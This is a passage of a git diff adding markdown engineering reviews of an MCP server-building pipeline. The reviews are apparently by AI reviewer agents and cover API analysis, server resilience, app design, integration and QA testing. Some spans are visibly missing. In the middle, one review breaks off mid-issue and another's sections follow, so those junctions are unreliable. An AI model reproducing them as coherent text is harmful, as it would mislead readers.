+**5. Add Elicitation to the server builder template** +- Document how tools can request user input via `elicitation/create` +- Map to our existing intake system +- Especially useful for destructive operations ("Are you sure?") + +**6. Add MCP protocol compliance testing to QA skill** +- Integrate MCP Inspector as Layer 0 +- Test `tools/list`, `tools/call`, lifecycle, error codes +- Validate `structuredContent` against `outputSchema` + +**7. Clarify LocalBosses app pattern vs MCP protocol** +- APP_DATA is LocalBosses-specific, not MCP +- Document the bridge: MCP `structuredContent` → LocalBosses app rendering +- Long-term: replace APP_DATA HTML comments with proper tool result routing + +### P2 — Nice to Have (forward-looking) + +**8. Add Tasks (async) support for slow API operations** +- Experimental in 2025-11-25, but useful for batch operations +- Mark as experimental in the template + +**9. Add content annotations (`audience`, `priority`) to tool results** +- Route user-facing content to apps, assistant-facing content to LLM context +- Low effort, moderate polish improvement + +**10. Plan for SDK v2 migration** +- v2 targets Q1 2026 stable release +- Package split: `@modelcontextprotocol/server` + `@modelcontextprotocol/client` +- Zod v4 is the default +- Middleware packages for Express/Hono/Node HTTP +- Add a migration note to the builder skill + +**11. Add `outputSchema` planning to the API analyzer** +- For each tool, capture the expected response schema +- This feeds directly into the builder's `outputSchema` declarations + +**12. Add Elicitation candidates to the API analyzer** +- Identify flows that benefit from mid-tool user interaction +- Auth confirmation, destructive operation confirmation, multi-step wizards + +--- + +## Appendix: Quick Reference — What the Spec Says Now + +### Tool Definition (2025-11-25): +```json +{ + "name": "list_contacts", + "title": "Contact List", + "description": "List contacts with filters...", + "icons": [{ "src": "...", "mimeType": "image/png" }], + "inputSchema": { "type": "object", ... }, + "outputSchema": { "type": "object", ... }, + "annotations": { + "readOnlyHint": true, + "destructiveHint": false, + "idempotentHint": true, + "openWorldHint": false + } +} +``` + +### Tool Result with structuredContent (2025-06-18+): +```json +{ + "content": [ + { "type": "text", "text": "{\"data\":[...]}" } + ], + "structuredContent": { + "data": [{ "name": "John", "email": "john@example.com" }], + "meta": { "total": 150, "page": 1 } + }, + "isError": false +} +``` + +### Error Handling (2025-11-25): +- **Protocol Errors**: JSON-RPC error codes (-32600 to -32603, -32700) + - Unknown tool, malformed request, server errors +- **Tool Execution Errors**: `isError: true` in result + - API failures, validation errors, business logic errors + - **Input validation errors SHOULD be Tool Execution Errors** (enables LLM self-correction) + +### Transports: +1. **stdio** — local subprocess, recommended for desktop clients +2. **Streamable HTTP** — HTTP POST/GET with optional SSE, recommended for production +3. SSE (legacy) — deprecated, use Streamable HTTP instead + +--- + +*Review complete. The pipeline is solid as a production framework — but it was designed around the 2025-03-26 spec and needs updating for the 2025-06-18 and 2025-11-25 spec releases. The three biggest gaps are structuredContent/outputSchema, the title field, and transport diversity. Fix those and this pipeline is genuinely state-of-the-art.* diff --git a/mcp-factory-reviews/beta-production-review.md b/mcp-factory-reviews/beta-production-review.md new file mode 100644 index 0000000..fe64334 --- /dev/null +++ b/mcp-factory-reviews/beta-production-review.md @@ -0,0 +1,547 @@ +# Agent Beta — Production Engineering & DX Review + +**Date:** 2026-02-04 +**Reviewer:** Agent Beta (Production Engineering & Developer Experience Expert) +**Scope:** MCP Factory pipeline — master blueprint + 5 skills +**Model:** Opus + +--- + +## Executive Summary + +- **The pipeline is well-structured for greenfield development but has no provisions for failure recovery, resumability, or rollback** — if an agent crashes mid-Phase 3 with 12 of 20 apps built, there's no checkpoint to resume from; the entire phase starts over. +- **The "30 untested servers" inventory is a ticking bomb at scale** — the skills assume each server is a fresh build, but the real near-term problem is validating/remediating 30 existing servers against live APIs; the pipeline has no "audit/remediation" mode. +- **Token budget and context window pressure are unaddressed** — research shows 50+ tools can consume 10,000-20,000 tokens just in tool definitions; with GHL at 65 apps and potentially 100+ tools, this is a live performance issue the skills don't acknowledge. +- **No gateway pattern, no centralized secret management, no health monitoring** — production MCP at scale (2026 state of the art) demands an MCP gateway for routing, centralized auth, and observability; the pipeline builds 30+ independent servers with independent auth, which the industry calls "connection chaos." +- **The skills are excellent reference documentation but lack operational runbooks** — they tell you *how to build* but not *how to operate*, *how to debug when broken at 3am*, or *how to upgrade when APIs change*. + +--- + +## Per-Skill Reviews + +### Skill 1: `mcp-api-analyzer` (Phase 1) + +**Strengths:** +- Excellent prioritized reading order (auth → rate limits → overview → endpoints → pagination). This is genuinely good engineering triage. +- The "Speed technique for large APIs" section acknowledging OpenAPI spec parsing is smart — most analysis time is wasted reading docs linearly. +- Tool description formula (`What it does. What it returns. When to use it.`) is simple, memorable, and effective. +- App candidate selection criteria (build vs skip) prevents app sprawl. + +**Issues:** + +1. **No handling of non-REST API patterns** (CRITICAL) + - The entire skill assumes REST APIs with standard HTTP verbs and JSON responses. + - **Missing:** GraphQL APIs (single endpoint, schema introspection, query/mutation split) + - **Missing:** SOAP/XML APIs (still common in enterprise: ServiceTitan, FieldEdge, some Clover endpoints) + - **Missing:** WebSocket/real-time APIs (relevant for chat, notifications, live dashboards) + - **Missing:** gRPC APIs (growing in B2B SaaS) + - **Fix:** Add a "API Style Detection" section upfront. If non-REST, document the adaptation pattern. For GraphQL: map queries→read tools, mutations→write tools, subscriptions→skip (or note for future). For SOAP: identify WSDL, map operations to tools. + +2. **Pagination analysis is too shallow** (HIGH) + - Lists cursor/offset/page as the only patterns, but real APIs have: + - **Link header pagination** (GitHub-style — `Link: ; rel="next"`) + - **Keyset pagination** (Stripe-style — `starting_after=obj_xxx`) + - **Scroll/search-after** (Elasticsearch-style) + - **Composite cursors** (base64-encoded JSON with multiple sort fields) + - **Token-based** (AWS-style `NextToken`) + - **Fix:** Expand pagination section with a pattern catalog. Each entry should note: how to request next page, how to detect last page, whether total count is available, and whether backwards pagination is supported. + +3. **Auth flow documentation assumes happy path** (MEDIUM) + - OAuth2 has 4+ grant types (authorization code, client credentials, PKCE, device code). The template just says "OAuth2" without specifying which. + - **Missing:** Token storage strategy for MCP servers (they're long-running processes — how do you handle token refresh for OAuth when the server may run for days?). + - **Missing:** API key rotation procedures. What happens when a key is compromised? + - **Fix:** Add auth pattern subtypes. For OAuth2 specifically, document: grant type, redirect URI requirements, scope requirements, token lifetime, refresh token availability. + +4. **No version/deprecation awareness** (MEDIUM) + - Says "skip changelog/migration guides" which is dangerous. Many APIs (GHL, Stripe, Twilio) actively deprecate endpoints and enforce version sunsets. + - **Fix:** Add a "Version & Deprecation" section to the analysis template: current stable version, deprecation timeline, breaking changes in recent versions, version header requirements. + +5. **Rate limit analysis doesn't consider burst patterns** (LOW-MEDIUM) + - Many APIs use token bucket or leaky bucket algorithms, not simple "X per minute" limits. + - The analysis should capture: sustained rate, burst allowance, rate limit scope (per-key, per-endpoint, per-user), and penalty for exceeding (429 response vs temporary ban). + +**DX Assessment:** A new agent could follow this skill clearly. The template is well-structured. The execution workflow at the bottom is a nice checklist. Main gap: the skill reads as "analyze a typical REST API" when reality is much messier. + +--- + +### Skill 2: `mcp-server-builder` (Phase 2) + +**Strengths:** +- The one-file vs modular decision tree (≤15 tools = one file) is pragmatic and prevents over-engineering. +- Auth pattern catalog (A through D) covers the most common cases. +- The annotation decision matrix is crystal clear. +- Zod validation as mandatory before any API call is the right call — catches bad input before burning rate limit quota. +- Error handling standards (client → handler → server) with explicit "never crash" rule. + +**Issues:** + +1. **Lazy loading provides minimal actual benefit for stdio transport** (CRITICAL MISCONCEPTION) + - The skill emphasizes lazy loading as a key performance feature, but research shows the real issue is different: + - **For stdio MCP servers**: The server process starts fresh per-session. `ListTools` is called immediately on connection, which triggers `loadAllGroups()` anyway. Lazy loading only helps if a tool is *never* used in a session — but the tool *definitions* are still loaded and sent. + - **The actual bottleneck is token consumption**, not server memory. Research from CatchMetrics shows 50+ tools with 200-token average definitions = 10,000+ tokens consumed from the AI's context window before any work begins. + - **What actually matters:** Concise tool descriptions and minimal schema verbosity. The skill optimizes the wrong thing. + - **Fix:** Add a "Token Budget Awareness" section. Set a target: total tool definition tokens should stay under 5,000 for a server. For large servers (GHL with 65 apps), implement tool groups that are *selectively registered* based on channel context, not just lazily loaded. + +2. **No circuit breaker pattern** (HIGH) + - The retry logic in `client.ts` does exponential backoff on 5xx errors, but: + - No circuit breaker to stop hammering a down service + - No fallback responses for degraded mode + - No per-endpoint failure tracking + - **Real-world scenario:** ServiceTitan's API goes down at 2am. Your server retries every request 3 times with backoff, but a user sending 10 messages triggers 30 failed requests in rapid succession. Without a circuit breaker, you're amplifying the failure. + - **Fix:** Add a simple circuit breaker to the API client: + ``` + - Track failure count per endpoint (or globally) + - After N consecutive failures, enter "open" state + - In "open" state, immediately return cached/error response without hitting API + - After timeout, try one request ("half-open") + - If succeeds, close circuit; if fails, stay open + ``` + +3. **Pagination helper assumes uniform patterns** (HIGH) + - The `paginate()` method in client.ts assumes query param pagination (`?page=1&pageSize=25`), but: + - Stripe uses `starting_after` with object IDs + - GHL uses different pagination per endpoint + - Some APIs use POST body for pagination (Elasticsearch) + - Some return a `next_url` you fetch directly + - **Fix:** Make pagination a pluggable strategy. Create a `PaginationStrategy` interface with implementations for: offset, cursor, keyset, link-header, and next-url patterns. Each tool can specify which strategy its endpoint uses. + +4. **No request/response logging** (HIGH) + - The server has zero observability. No structured logging. No request IDs. No timing. + - When something breaks in production, the only signal is `console.error` on stderr. + - **Fix:** Add a minimal structured logger: + ```typescript + function log(level: string, event: string, data: Record) { + console.error(JSON.stringify({ ts: new Date().toISOString(), level, event, ...data })); + } + ``` + Log: tool invocations (name, duration, success/fail), API requests (endpoint, status, duration), errors (with stack traces). + +5. **TypeScript template has placeholder variables** (MEDIUM-DX) + - `process.env.{SERVICE}_API_KEY` — the curly braces are literal template markers that won't compile. + - The builder agent needs to know to replace these. This is documented implicitly but could trip up an automated build. + - **Fix:** Either use actual environment variable names in examples, or add an explicit "Template Variables" section listing all `{service}`, `{SERVICE}`, `{Service}` patterns that must be replaced. + +6. **No health check or self-test capability** (MEDIUM) + - No way to verify the server is working without sending a real tool call. + - **Fix:** Add a `ping` or `health_check` tool that validates: env vars are set, API base URL is reachable, auth token is valid. This is invaluable for QA (Phase 5) and ongoing monitoring. + +7. **Missing: Connection timeout configuration** (MEDIUM) + - The `fetch()` calls have no timeout. A hanging API response will block the tool indefinitely. + - **Fix:** Add `AbortController` with configurable timeout (default 30s) to every request. + +**DX Assessment:** Strong skill. An agent given an analysis doc can produce a working server. The templates are copy-paste ready (after variable substitution). Biggest risk: servers work in demo but fail under real-world conditions because resilience patterns are absent. + +--- + +### Skill 3: `mcp-app-designer` (Phase 3) + +**Strengths:** +- The design system is comprehensive and consistent. Color tokens, typography scale, spacing — this is production-quality design documentation. +- 8 app type templates cover the vast majority of use cases. +- Three required states (loading, empty, data) with the skeleton animation is excellent UX. +- Utility functions (`escapeHtml`, `formatCurrency`, `getBadgeClass`) prevent common bugs. +- `escapeHtml()` prevents XSS — security-aware by default. + +**Issues:** + +1. **Polling creates unnecessary load at scale** (HIGH) + - Every app polls `/api/app-data` every 3 seconds. With 10 apps open across tabs/threads, that's 200 requests/minute to the LocalBosses API. + - The comment says "stop polling once we have data" but only if postMessage succeeds first. If the initial postMessage fails (race condition), polling continues indefinitely. + - **Fix:** + - Increase poll interval to 5s, then 10s, then 30s (exponential backoff on polling) + - Add a maximum poll count (stop after 20 attempts, show error state) + - Consider replacing polling with a one-time fetch + event listener pattern + - Add `document.hidden` check — don't poll if tab isn't visible (`visibilitychange` event) + +2. **No data validation in render functions** (HIGH) + - The render functions do basic null checks but don't validate data shapes. If the AI returns `data.contacts` but the app expects `data.data`, you get a blank screen with no error. + - Every app type template accesses data differently: `data.data || data.items || data.contacts || data.results` — this "try everything" pattern masks bugs and makes debugging hard. + - **Fix:** Add a `validateData(data, expectedShape)` helper that checks for required fields and logs warnings for missing ones. Have each app type declare its expected data shape explicitly. + +3. **Accessibility is completely absent** (MEDIUM) + - No ARIA attributes, no keyboard navigation, no focus management. + - Tables have no `scope` attributes on headers. + - Status badges rely solely on color (fails WCAG for color-blind users). + - **Fix:** At minimum: add `role` attributes to dynamic regions, `aria-label` on interactive elements, and text alternatives for color-coded status badges (e.g., add a text prefix: "● Active" vs just the green badge). + +4. **CSS-only charts don't handle negative values or zero-height bars** (LOW-MEDIUM) + - The analytics bar chart template: `height:${Math.max(pct, 2)}%` — minimum 2% height is good, but: + - No support for negative values (common in financial data: losses, negative growth) + - No axis labels or gridlines + - Bar chart is the only visualization option + - **Fix:** For the factory's scope this is acceptable, but add a note that complex visualizations should use a lightweight inline charting approach or consider SVG-based charts (still no external deps). + +5. **File size guideline ("under 50KB") may be exceeded for complex apps** (LOW) + - The pipeline/kanban template with 20+ items in 6 stages, plus all the CSS and utility functions, can exceed 50KB. + - **Fix:** The guideline is fine, but add a note about minification. Even simple whitespace removal can cut 30% off HTML file sizes. Could add a build step: `html-minifier` in the server build process. + +**DX Assessment:** The strongest skill in terms of "copy template, customize, ship." The design system is well-documented enough that even a junior developer could build consistent apps. The templates handle 90% of cases well. The 10% edge cases (complex data, accessibility, performance) are where issues arise. + +--- + +### Skill 4: `mcp-localbosses-integrator` (Phase 4) + +**Strengths:** +- The cross-reference check ("every app ID must appear in ALL 4 files") is critical and well-called-out. +- The complete Calendly example at the end is extremely helpful — shows all 5 files in one cohesive example. +- System prompt engineering guidelines differentiate natural language capability descriptions from raw tool names. +- The `systemPromptAddon` pattern with sample data shapes is clever — gives the AI a template to follow. + +**Issues:** + +1. **No automated cross-reference validation** (CRITICAL) + - The skill says "verify all app IDs appear in all 4 files" but provides no automated way to do this. + - With 30+ servers × 5-15 apps each = 150-450 app IDs to track. Manual verification is guaranteed to miss something. + - **Fix:** Create a validation script (should live in `scripts/validate-integration.ts`): + ``` + - Parse channels.ts → extract all mcpApps arrays + - Parse appNames.ts → extract all keys + - Parse app-intakes.ts → extract all keys + - Parse mcp-apps/route.ts → extract APP_NAME_MAP keys + - Cross-reference: every ID in channels must exist in other 3 files + - Verify: every APP_NAME_MAP entry resolves to an actual HTML file + - Output: missing entries, orphaned entries, file resolution failures + ``` + - This script should run in CI and as part of Phase 5 QA. + +2. **System prompt scaling problem** (HIGH) + - Each channel gets one system prompt that lists all capabilities. For GHL (65 apps, 100+ tools), this prompt is enormous. + - The `systemPromptAddon` in app-intakes adds *per-thread* instructions with sample data shapes. For a channel with 15 apps, the AI's context is loaded with instructions for all 15 app types even though only 1 is active. + - **Fix:** + - System prompts should be modular: core identity + dynamically injected tool-group descriptions based on the current thread's app. + - `systemPromptAddon` should be the ONLY app-specific instruction injected, not in addition to the full channel prompt. + - Consider a "prompt budget" target: channel system prompt < 500 tokens, addon < 300 tokens. + +3. **APP_DATA format is fragile** (HIGH) + - The `` format relies on the AI producing exact delimiters. + - Real-world failure modes: + - AI adds a line break inside the JSON (spec says "single line" but LLMs don't reliably follow this) + - AI adds text after END_APP_DATA + - AI wraps it in a code block (````json\n`). This is the weakest link. Even with the parser fallbacks, LLMs regularly produce: multi-line JSON (breaking the "single line" rule), truncated JSON (context window limits), hallucinated data (when they don't have real tool results), and inconsistent field names (calling it `total_contacts` vs `totalContacts` vs `contacts_count`). +- **No schema enforcement between tool output and APP_DATA.** The tool returns `structuredContent` with a known schema. The LLM then re-serializes this as APP_DATA. But there's no validation that the LLM's APP_DATA matches what the app's `render()` function expects. The tool might return `{data: [...]}` but the LLM outputs `{contacts: [...]}`, and the app looks for `data.data` and shows the empty state. +- **System prompts are duplicating tool information.** The channel system prompt describes tools in natural language, and the MCP tool definitions ALSO describe tools. This is double context consumption. When tools change, the system prompt becomes stale. +- **The `systemPromptAddon` examples include sample JSON structures.** This consumes significant tokens showing the LLM what to output, but it's fragile — if the app's render function changes, the addon becomes a lie. +- **Thread State Management relies entirely on localStorage.** No server-side persistence means all thread history is lost on cache clear, device switch, or incognito mode. + +**Testing theater vs real quality:** +- The Integration Validation Script is excellent for static cross-referencing. But it doesn't test the *runtime* behavior — does clicking the app actually open a thread? Does the AI actually generate valid APP_DATA? Those are left entirely to manual Phase 5 QA. + +--- + +### 6. mcp-qa-tester/SKILL.md + +**What's great:** +- The 6-layer testing architecture (Protocol → Static → Visual → Accessibility → Functional → Performance → Live API → Security → Integration) is genuinely comprehensive. +- Quantitative Quality Metrics with specific targets (Tool Correctness >95%, Task Completion >90%, Accessibility >90%, Cold Start <2s, Latency P50 <3s) — finally, numbers instead of checkboxes. +- MCP Protocol Compliance testing via MCP Inspector + custom JSON-RPC lifecycle tests validates the foundation correctly. +- Automated Playwright visual tests that check loading/empty/data states, dark theme compliance, and responsive layout are well-designed. +- axe-core accessibility integration with score calculation and keyboard navigation testing is real accessibility testing, not theater. +- The BackstopJS visual regression approach with 5% pixel diff threshold is solid. +- Security testing with 10 XSS payloads, postMessage origin validation, CSP checks, and API key exposure scans covers the critical vectors. +- Chaos testing (API 500s, wrong postMessage format, 500KB datasets, rapid-fire messages, concurrent apps) tests real failure modes. +- Test data fixtures library with edge cases (unicode, extremely long text, null values, XSS payloads) is thorough. +- Persistent QA reports with trend tracking across runs enables regression detection. + +**What would produce mediocre experiences:** +- **Tool Correctness testing is theoretical.** The skill defines routing fixtures (20+ NL messages → expected tool) but doesn't actually send them through the LLM. It validates that fixture files exist and that tool names are real. The actual routing accuracy test requires "the AI/LLM in the loop" — acknowledged as a comment but not automated. +- **No end-to-end data flow testing.** There's no test that: (1) sends a message to the AI, (2) verifies the AI calls the right tool, (3) captures the AI's response, (4) extracts APP_DATA, (5) validates APP_DATA schema, (6) sends it to the app iframe, (7) screenshots the result. This end-to-end flow is the magic moment, and it's tested manually. +- **MSW mocks test the handler code, not the real API.** Layer 3 tests use Mock Service Worker — essential for unit testing, but the mocks are hand-crafted. There's no guarantee the mocks match the real API's response shape. If the real API returns `{results: [...]}` but the mock returns `{data: [...]}`, the tests pass but production fails. +- **No APP_DATA generation testing with actual LLMs.** The QA skill validates APP_DATA *parsing* (can we extract JSON from the text?) but not APP_DATA *generation* (does the LLM actually produce correct JSON given the system prompt?). This is the highest-failure-rate step. +- **Visual testing requires manual baseline capture.** `backstop reference` must be run when apps are "verified correct" — but who verifies? And baselines aren't stored in version control by default. +- **No monitoring or production quality metrics.** All testing is pre-ship. There's no guidance on tracking tool correctness, APP_DATA parse success rate, or user satisfaction in production. + +**Testing theater vs real quality:** +- The QA skill is about 70% real testing (static analysis, visual regression, accessibility, security, chaos) and 30% theater (tool routing fixtures that aren't run through LLMs, E2E scenarios that are manual templates, live API testing that's skipped for 30/37 servers due to missing credentials). +- The biggest gap: **the most important quality question — "does the user get the right data in a beautiful app within 3 seconds?" — is never tested automatically.** + +--- + +## Pass 2 Notes (user journey trace, quality gaps, testing theater) + +### The Full User Journey (traced end-to-end) + +``` +USER types: "show me my top customers" + │ + ▼ [QUALITY DROP POINT 1: Tool Selection] +AI reads system prompt + tool definitions +AI must select correct tool (list_contacts? search_contacts? get_analytics?) + │ + ▼ [QUALITY DROP POINT 2: Parameter Selection] +AI must figure out what "top" means (by revenue? by recency? by deal count?) +If ambiguous, should it ask or guess? + │ + ▼ [QUALITY DROP POINT 3: API Execution] +MCP tool calls real API → gets data or error +Error handling must be graceful (circuit breaker, retry, timeout) + │ + ▼ [QUALITY DROP POINT 4: LLM Re-serialization ← BIGGEST GAP] +AI receives structuredContent from tool +AI must re-serialize it as APP_DATA JSON in its text response +This is where JSON gets mangled, fields get renamed, data gets truncated + │ + ▼ [QUALITY DROP POINT 5: APP_DATA Parsing] +Frontend must parse from response text +The parser has fallbacks, but failure = app shows empty state + │ + ▼ [QUALITY DROP POINT 6: Data Shape Mismatch] +App's render() expects data.data[] but receives data.contacts[] +App shows empty state or crashes — user sees nothing + │ + ▼ [QUALITY DROP POINT 7: Render Quality] +App renders with correct data +But: is it the RIGHT data? Did the AI interpret "top customers" correctly? + │ + ▼ USER sees result (total time: 3-10 seconds) +``` + +**The critical insight:** Quality Drop Point 4 (LLM Re-serialization) is the highest-failure-rate step, yet it has the LEAST testing coverage. The analyzer writes tool descriptions (helps point 1), the builder validates API calls (helps point 3), the QA tester checks visual rendering (helps point 7), but NOBODY systematically tests points 4-6. + +### Mental Testing: Ambiguous Queries + +I mentally tested the tool descriptions with ambiguous queries: + +| User Says | Ambiguity | Current System Response | Better Response | +|---|---|---|---| +| "show me John" | Which John? Which tool? | Probably `search_contacts` — but if multiple Johns, shows grid instead of card | Should ask "Which John?" via elicitation, or show grid with filter | +| "delete everything" | Delete what? | Hopefully doesn't call `delete_*` — system prompt says "confirm first" | Should refuse without specifics — destructive + vague = must clarify | +| "what happened today" | Activity? Calendar? Dashboard? | Could route to timeline, calendar, or dashboard depending on channel | Should default to timeline/activity feed — "what happened" implies events | +| "update the deal" | Which deal? What fields? | `update_deal` needs an ID — will fail with validation error | Should search deals first, then ask which one | +| "show me revenue and also add a new contact named Sarah" | Multi-intent | Will likely only handle one intent (probably the first) | Should acknowledge both, handle sequentially, or ask which to do first | +| "actually, I meant the other one" | Contextual correction | System has no memory of previous results — can't resolve "the other one" | Need conversation state tracking — remember previous result sets | + +**Key finding:** Multi-intent messages and contextual corrections are completely unaddressed. The system prompt has no guidance for handling "actually I meant..." or "also do X." + +### System Prompt Sufficiency for APP_DATA + +I evaluated whether the `systemPromptAddon` templates actually produce correct APP_DATA consistently: + +**The Good:** +- Few-shot examples (when included) dramatically improve consistency +- The explicit field listing ("Required fields: title, metrics, recent") helps + +**The Bad:** +- The system prompt says "SINGLE LINE JSON" but LLMs consistently produce multi-line JSON, especially for large datasets. The parser handles this, but it shouldn't have to. +- No schema validation between what the addon describes and what the app's render() expects. These can drift silently. +- The addon tells the LLM to "generate REALISTIC data" — but when using real tool results, it should use THAT data, not fabricate realistic-looking data. This instruction is confusing. + +### Are the Apps Actually Delightful? + +**What feels good:** +- The dark theme is polished and consistent — it feels like a real product, not a prototype +- Loading skeletons with shimmer animation look professional +- Status badges with semantic colors (green=active, red=failed) communicate at a glance +- The Interactive Data Grid with sort/filter/expand is genuinely useful + +**What feels mediocre:** +- **Static data.** Once rendered, the app is a snapshot. No live updates, no streaming data. You see "245 contacts" but it doesn't change until you ask another question. +- **No visual feedback during AI processing.** User types a follow-up question → sees the old app → waits → suddenly the app flashes with new data. No "updating..." indicator. +- **No drill-down.** You see a data grid with contacts but clicking a contact name doesn't open the detail card. The `sendToHost('navigate')` pattern exists in code but isn't wired up. +- **No data persistence across sessions.** Close the browser, lose all thread state and app data. +- **Charts are basic.** The SVG primitives are functional but look like early d3.js examples, not like a modern analytics dashboard. No tooltips on hover, no click-to-filter, no zoom. + +--- + +## Research Findings (latest techniques for tool optimization and agent evaluation) + +### 1. Berkeley Function Calling Leaderboard (BFCL V4) — Key Findings + +The BFCL evaluates LLMs' ability to call functions accurately across real-world scenarios. Key insights: +- **Negative instructions reduce misrouting by ~30%.** The MCP Factory already includes "Do NOT use when..." in tool descriptions — this is validated by BFCL research. +- **Tool count vs accuracy tradeoff:** Accuracy degrades significantly above 15-20 active tools per interaction. The Factory's lazy loading approach (loading groups on demand) is the right mitigation, but the `ListTools` handler returns ALL tools regardless. Clients see the full inventory. +- **Multi-step tool chains** are where most agents fail. Searching for a contact, then getting details, then updating — requires correct tool sequencing. The system prompts don't address multi-step chains. + +### 2. Paragon's Tool Calling Optimization Research (2025-2026) + +From Paragon's 50-test-case evaluation across 6 LLMs: +- **LLM choice has the biggest impact** on tool correctness. OpenAI o3 (2025-04-16) performed best. Claude 3.5 Sonnet was strong. The Factory's model recommendation (Opus for analysis, Sonnet for building) is sound. +- **Better tool descriptions improve performance more than better system prompts.** This validates the Factory's emphasis on the 6-part description formula. +- **Reducing tool count** (fewer tools per interaction) has a larger effect than improving descriptions. The Factory's 15-20 tools per interaction target aligns with this finding. +- **DeepEval's Tool Correctness metric** (correct tools / total test cases) and Task Completion metric (LLM-judged) are the industry standard for measuring tool calling quality. + +### 3. DeepEval Agent Evaluation Framework (2025-2026) + +DeepEval provides the most mature framework for evaluating AI agents: +- **Separate reasoning and action evaluation.** Reasoning (did the agent plan correctly?) and Action (did it call the right tools?) should be measured independently. +- **Key metrics:** PlanQualityMetric, PlanAdherenceMetric, ToolCorrectnessMetric, TaskCompletionMetric. +- **Production monitoring:** DeepEval supports `update_current_span()` for tracing agent actions in production — enabling real-time quality measurement. +- **LLM-as-judge for task completion:** Instead of hand-crafted ground truth, use an LLM to evaluate whether the task was completed. This scales to thousands of test cases. + +**Recommendation for MCP Factory:** Integrate DeepEval as the evaluation framework for Layer 3 functional testing. Replace the manual routing fixture approach with automated DeepEval test runs. + +### 4. MCP Apps Protocol (Official Extension — January 2026) + +The MCP Apps extension is now live (announced January 26, 2026). Key features: +- **`_meta.ui.resourceUri`** on tools — tools declare which UI to render +- **`ui://` resource URIs** — server-side HTML/JS served as MCP resources +- **JSON-RPC over postMessage** — bidirectional app↔host communication +- **`@modelcontextprotocol/ext-apps`** SDK — standardized App class with `ontoolresult`, `callServerTool`, `updateModelContext` +- **Client support:** Claude, ChatGPT, VS Code, Goose — all support MCP Apps today + +**Critical implication for LocalBosses:** The APP_DATA block pattern (``) is now legacy. MCP Apps provides the official way to deliver UI from tools. The medium-term roadmap in the Integrator skill (route structuredContent directly to apps) should be accelerated, and the long-term roadmap (MCP Apps protocol) is no longer "future" — it's available NOW. + +### 5. Tool Description Optimization Research + +From academic papers and production experience: +- **Explicit negative constraints** in descriptions ("Do NOT use when...") reduce misrouting more than positive guidance ("Use when...") +- **Field name lists** in descriptions (`Returns {name, email, status}`) help the LLM understand response shape — critical for APP_DATA generation +- **Parameter descriptions** matter less than tool-level descriptions for routing accuracy +- **Ordering tools by frequency of use** in the tools list can improve selection for top tools (LLMs have position bias — first tools are slightly more likely to be selected) + +--- + +## Proposed Improvements (specific, actionable, with examples) + +### CRITICAL Priority (do these first) + +#### 1. Eliminate the LLM Re-serialization Bottleneck + +**Problem:** The entire app data flow depends on the LLM correctly embedding JSON in its text response. This is the #1 source of quality failures. + +**Solution:** Implement the "medium-term" architecture NOW — route `structuredContent` from tool results directly to the app iframe, bypassing LLM text generation. + +**Implementation:** +```typescript +// In chat/route.ts — intercept tool results BEFORE LLM generates text +const toolResults = await mcpClient.callTool(toolName, args); + +if (toolResults.structuredContent && activeAppId) { + // Route structured data directly to the app — no LLM re-serialization + await sendToApp(activeAppId, toolResults.structuredContent); +} + +// LLM still generates the text explanation, but doesn't need to embed JSON +// APP_DATA block becomes optional fallback, not primary data channel +``` + +**Impact:** Eliminates Quality Drop Points 4, 5, and 6 from the user journey. Data goes from tool → app with zero lossy transformation. + +#### 2. Adopt MCP Apps Protocol + +**Problem:** The custom APP_DATA pattern works only in LocalBosses. MCP Apps is now an official standard supported by Claude, ChatGPT, VS Code, and Goose. + +**Solution:** Migrate MCP servers to use `_meta.ui.resourceUri` on tools, serve app HTML via `ui://` resources, and use `@modelcontextprotocol/ext-apps` SDK in apps. + +**Implementation path:** +1. Add `_meta.ui.resourceUri` to tool definitions in the server builder template +2. Register app HTML files as `ui://` resources in each MCP server +3. Update app template to use `@modelcontextprotocol/ext-apps` App class for data reception +4. Maintain backward compatibility with postMessage/polling for LocalBosses during transition + +**Impact:** MCP tools work in ANY MCP client (Claude, ChatGPT, VS Code) — not just LocalBosses. Huge distribution multiplier. + +#### 3. Automated Tool Routing Evaluation with DeepEval + +**Problem:** Tool routing accuracy is tested with static fixture files that aren't actually run through an LLM. It's the most important quality metric with the least real testing. + +**Solution:** Integrate DeepEval's ToolCorrectnessMetric and TaskCompletionMetric into the QA pipeline. + +**Implementation:** +```python +# tests/tool_routing_eval.py +from deepeval import evaluate +from deepeval.metrics import ToolCorrectnessMetric +from deepeval.test_case import LLMTestCase, ToolCall + +test_cases = [ + LLMTestCase( + input="Show me all active contacts", + actual_output=agent_response, + expected_tools=[ToolCall(name="list_contacts", arguments={"status": "active"})], + tools_called=[actual_tool_call], + ), + # ... 20+ test cases per server +] + +metric = ToolCorrectnessMetric() +evaluate(test_cases, [metric]) +# Returns: Tool Correctness Rate with per-case breakdowns +``` + +**Impact:** Transforms tool routing testing from theater (fixture files exist) to real measurement (LLM actually routes correctly X% of the time). + +### HIGH Priority + +#### 4. Add "Updating..." State to Apps + +**Problem:** When the user asks a follow-up question, the app shows stale data with no visual indicator that new data is incoming. + +**Solution:** Add a fourth state: "updating" — shows a subtle overlay or indicator on the existing data while new data loads. + +**Implementation:** +```javascript +// In app template — add updating state +function showState(state) { + document.getElementById('loading').style.display = state === 'loading' ? 'block' : 'none'; + document.getElementById('empty').style.display = state === 'empty' ? 'block' : 'none'; + const content = document.getElementById('content'); + content.style.display = (state === 'data' || state === 'updating') ? 'block' : 'none'; + + // Updating overlay + const overlay = document.getElementById('updating-overlay'); + if (overlay) overlay.style.display = state === 'updating' ? 'flex' : 'none'; +} + +// When user sends a new message (detected via postMessage from host) +window.addEventListener('message', (event) => { + if (event.data.type === 'user_message_sent') { + showState('updating'); // Show "Updating..." on current data + } + if (event.data.type === 'mcp_app_data') { + handleData(event.data.data); // Replace with new data + } +}); +``` + +**Impact:** User knows the system is working on their request. Reduces perceived latency by 50%+. + +#### 5. Wire Up Bidirectional Communication (App → Host) + +**Problem:** `sendToHost('navigate')`, `sendToHost('tool_call')`, and `sendToHost('refresh')` are documented in the app designer but never wired up on the host side. + +**Solution:** Document and implement the host-side handler in the integrator skill. + +**Implementation (in LocalBosses host):** +```typescript +// In the iframe wrapper component +iframe.contentWindow.addEventListener('message', (event) => { + if (event.data.type === 'mcp_app_action') { + switch (event.data.action) { + case 'navigate': + openApp(event.data.payload.app, event.data.payload.params); + break; + case 'refresh': + resendLastToolCall(); + break; + case 'tool_call': + sendMessageToThread(`[Auto] Calling ${event.data.payload.tool}...`); + // Trigger the tool call through the chat API + break; + } + } +}); +``` + +**Impact:** Enables drill-down (click contact in grid → open contact card), refresh buttons, and in-app actions. Transforms static apps into interactive ones. + +#### 6. 